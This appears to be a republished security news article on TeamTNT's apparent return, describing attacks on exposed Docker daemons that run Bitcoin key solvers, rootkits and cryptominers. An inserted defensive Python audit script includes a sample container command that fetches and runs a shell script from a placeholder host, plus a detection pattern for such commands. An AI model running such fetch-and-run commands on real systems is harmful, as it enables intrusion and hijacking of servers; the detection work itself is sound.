
Hard News Hard Hitting News Source Global Political News


TeamTNT hijacking servers to run Bitcoin encryption solvers

Threat analysts at AquaSec have spotted signs of TeamTNT activity on their honeypots since early September, leading them to believe the notorious hacking group is back in action.

TeamTNT announced it was quitting back in November 2021, and indeed, most associated observations since then involved remnants of past infections like automated scripts but no new payloads.

However, the recent attacks bear various signatures linked to TeamTNT and rely on tools previously deployed by the gang, indicating that the threat actor is likely making a comeback.

Targeting Bitcoin encryption

The researchers observed three attack types in the allegedly new TeamTNT campaign, the most notable of which uses the computational power of hijacked servers to run Bitcoin encryption solvers.

Named “the Kangaroo attack” because it uses Pollard’s Kangaroo WIF solver, the attack scans for vulnerable Docker daemons, deploys an AlpineOS image, drops a script (“k.sh”), and eventually fetches the solver from GitHub.

The Kangaroo attack diagram (AquaSec)

Pollard’s Kangaroo interval ECDLP (Elliptic Curve Discrete Logarithm Problem) solver is an attempt to break the SECP256K1 encryption used in Bitcoin’s public-key cryptography.

“It [the algorithm] is designed to run in a distributed fashion since the algorithm breaks the key into chunks and distributes them to various nodes (attacked servers), collecting the results which are then written locally to a text file,” explains AquaSec.

While quantum computing is expected to break existing Bitcoin encryption at some point in the future, it’s considered impossible to achieve it with current machines, but TeamTNT appears willing to try out the theory anyway using other people’s resources.

Possibly, the threat actors are merely experimenting with new attack pathways, payload deployment, and evading detection while performing intensive operations on captured systems, with the Kangaroo attack ticking all boxes.

Other attack types

The other attacks observed by AquaSec are similar to past TeamTNT operations but now feature some novel characteristics.

The “Cronb Attack” uses documented rootkits, cron jobs for persistence, cryptominers for profit, and tools for lateral movement. The novel element is the appearance of new C2 infrastructure addresses and more elaborate data exchange.

The “What Will Be” attack again targets Docker daemons with Alpine images that drop a shell file, exploiting a vulnerability to escape from the container to the host.

Next, the intruders download and execute additional scripts, rootkits, and a cryptominer, while they also add cronjobs and perform SSH scans on the network.

The “What Will Be” attack diagram (AquaSec)
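Both the Kangaroo and the “What Will Be” chains start the same way: a throwaway Alpine container whose entry command fetches and runs a dropped shell script. The audit below is an added example (not AquaSec’s or BleepingComputer’s code) that scans `docker inspect`-style records for that pattern; the privileged, host-root-mount and host-PID checks are general container-hardening indicators assumed here, not details the article gives about the escape vulnerability, and the sample records are constructed.

```python
"""Audit Docker container records for the pattern described in the article:
minimal Alpine images whose command fetches and runs a shell script, plus
host-level privileges that would let such a container reach the host."""
import json
import re

# Constructed sample: a trimmed subset of the fields `docker inspect` returns.
# Illustrative records only, not captured from a real incident.
SAMPLE_CONTAINERS = json.loads(r'''[
  {"Id": "a1", "Config": {"Image": "alpine:3.16",
     "Cmd": ["sh", "-c", "wget -qO- http://example.invalid/k.sh | sh"]},
   "HostConfig": {"Privileged": true, "Binds": ["/:/host"], "PidMode": "host"}},
  {"Id": "b2", "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
   "HostConfig": {"Privileged": false, "Binds": ["/srv/www:/usr/share/nginx/html:ro"]}},
  {"Id": "c3", "Config": {"Image": "alpine:latest", "Cmd": ["sleep", "3600"]},
   "HostConfig": {"Privileged": false, "Binds": []}}
]''')

# "curl/wget ... something.sh ... | sh" or "chmod +x ... something.sh"
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\.sh\b.*\|\s*(ba)?sh\b|\bchmod\s+\+x\b.*\.sh")

def container_findings(c):
    """Return the list of indicator names that apply to one container record."""
    cfg, host = c.get("Config", {}), c.get("HostConfig", {})
    cmd = " ".join(cfg.get("Cmd") or [])
    findings = []
    if cfg.get("Image", "").split(":")[0].endswith("alpine"):
        findings.append("minimal-alpine-image")
    if FETCH_AND_RUN.search(cmd):
        findings.append("cmd-fetches-and-runs-shell-script")
    if host.get("Privileged"):
        findings.append("privileged")
    if any(b.split(":")[0] == "/" for b in host.get("Binds") or []):
        findings.append("host-root-bind-mount")
    if host.get("PidMode") == "host":
        findings.append("host-pid-namespace")
    return findings

def audit(containers):
    """Map container id -> findings, keeping only containers with something
    beyond the (benign on its own) Alpine base image."""
    report = {}
    for c in containers:
        f = container_findings(c)
        if f and f != ["minimal-alpine-image"]:
            report[c["Id"]] = f
    return report

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_CONTAINERS), indent=2))
```

On a live host, feed it the output of `docker inspect $(docker ps -q)` instead of the constructed sample.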

One new trick in this attack is introduced via those scripts, which let the threat actors optimize cryptomining performance by modifying the CPU’s model-specific registers (MSRs) for the host architecture.

Optimizing CPU for cryptomining (AquaSec)

Whether it is TeamTNT conducting these attacks or someone else, organizations should ramp up their cloud security, strengthen Docker configuration, and apply all available security updates before it’s too late.

Source: https://www.bleepingcomputer.com/news/security/teamtnt-hijacking-servers-to-run-bitcoin-encryption-solvers/
